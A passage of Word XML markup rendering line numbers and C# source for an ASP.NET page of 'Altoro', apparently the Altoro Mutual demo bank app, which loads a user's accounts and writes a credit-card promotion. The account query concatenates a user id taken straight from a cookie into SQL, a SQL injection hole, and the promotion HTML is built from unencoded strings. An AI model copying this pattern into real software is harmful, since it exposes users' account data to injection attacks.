            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 74</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 75</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 76</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 77</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 78</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 79</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 80</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 81</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 82</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 83</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 84</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 85</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 86</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 87</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 88</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 89</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 90</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 91</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 92</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 93</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 94</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 95</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 96</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 97</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 98</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 99</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>100</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>101</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>102</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11744"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using System.Collections;</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>using System.ComponentModel;</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>using System.Data;</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>using System.Data.OleDb;</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>using System.Web;</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>using System.Web.SessionState;</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>using System.Web.UI;</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>using System.Web.UI.WebControls;</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>using System.Web.UI.HtmlControls;</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>using System.Configuration;</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>namespace Altoro</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">    /// &lt;summary&gt;</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">    /// Summary description for welcome.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">    /// &lt;/summary&gt;</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">    public partial class Default : Page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protected void Page_Load(object sender, System.EventArgs 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Response.Cache.SetCacheability(HttpCacheability.NoCache);</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">            if (!(System.Convert.ToBoolean(Session["authenticated"])))</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Server.Transfer("logout.aspx");</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string thisUser = Request.Cookies["amUserId"].Value;</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">            DataRow myRow;</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">            DataTable acctTable = GetAccounts(thisUser);</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">            CheckPromo(thisUser);</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">            for (int i = 0; i &lt; acctTable.Rows.Count; i++)</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myRow = acctTable.Rows[i];</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">                ArrayList myList = new ArrayList();</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">                myList.Add(myRow["accountid"].ToString());</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">                myList.Add(myRow["accountid"].ToString() + " " + myRow["acct_type"].ToString());</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">                listAccounts.myItems.Add(myList);</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private DataTable GetAccounts(string userId)</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OleDbConnection myConnection = new OleDbConnection();</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">            myConnection.ConnectionString </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>= ConfigurationManager.ConnectionStrings["DBConnStr"].ConnectionString;            myConnection.Open();</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">            string query = "SELECT accountid, acct_type From accounts WHERE userid = " + userId;</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">            OleDbDataAdapter myAccounts = new OleDbDataAdapter(query, myConnection);</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">            DataSet ds = new DataSet();</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">            myAccounts.Fill(ds, "accounts");</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">            DataTable myTable = ds.Tables["accounts"];</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">            myConnection.Close();</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">            return myTable;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private void WritePromo(string cType, string cLimit, string cInterest)</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string promoText = "&lt;table width=590 border=0&gt;";</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"><![CDATA[            promoText += "<tr><td><h2>Congratulations! </h2></td></tr>";]]></w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">            promoText += "&lt;tr&gt;&lt;td&gt;You have been pre-approved for an Altoro ";</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">            promoText += cType;</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">            promoText += " Visa with a credit limit of $";</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
